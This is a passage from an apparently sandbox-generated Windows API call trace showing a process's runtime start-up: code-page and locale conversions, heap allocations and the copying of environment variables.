CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eab8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0149.872] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0149.872] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e8a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0149.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18ef68, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÚº\x96U¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0149.873] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0149.873] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4088ff [0149.873] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0149.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1f) returned 0x2def60 [0149.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2def60, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0149.873] GetLastError () returned 0x0 [0149.873] SetLastError (dwErrCode=0x0) [0149.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2e1190 [0149.873] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1190) returned 0x4 [0149.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1190, Size=0x8) returned 0x2e1190 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0149.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e11a0 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2e11a0, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1190) returned 0x8 [0149.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1190, Size=0xc) returned 0x2e11e0 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0149.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x37) returned 0x2e11f8 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e11f8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.874] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e11e0) returned 0xc [0149.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e11e0, Size=0x10) returned 0x2e11e0 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0149.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d4fd0 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2d4fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0149.874] GetLastError () returned 0x0 [0149.874] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e11e0) returned 0x10 [0149.875] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e11e0, Size=0x14) returned 0x2e1238 [0149.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0149.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x31) returned 0x2e1258 [0149.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e1258, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1238) returned 0x14 [0149.876] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1238, Size=0x18) returned 0x2e1238 [0149.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0149.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1298 [0149.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1298, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1238) returned 0x18 [0149.877] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1238, Size=0x1c) returned 0x2e12b8 [0149.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0149.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2daa20 [0149.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x2daa20, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.877] SetLastError (dwErrCode=0x0) [0149.877] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x1c [0149.878] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x20) returned 0x2e12b8 [0149.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e1238 [0149.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2e1238, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] GetLastError () returned 0x0 [0149.878] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x20 [0149.879] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x24) returned 0x2e12b8 [0149.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd) returned 0x2de6b8 [0149.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x2de6b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] GetLastError () returned 0x0 [0149.879] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x24 [0149.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x28) returned 0x2e12b8 [0149.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0149.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x25) returned 0x2daa50 [0149.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2daa50, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.880] GetLastError () returned 0x0 [0149.880] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] GetLastError () returned 0x0 [0149.881] SetLastError (dwErrCode=0x0) [0149.882] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x28 [0149.882] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x2c) returned 0x2e12b8 [0149.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0149.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x39) returned 0x2d5018 [0149.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2d5018, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.882] SetLastError (dwErrCode=0x0) [0149.882] GetLastError () returned 0x0 [0149.883] 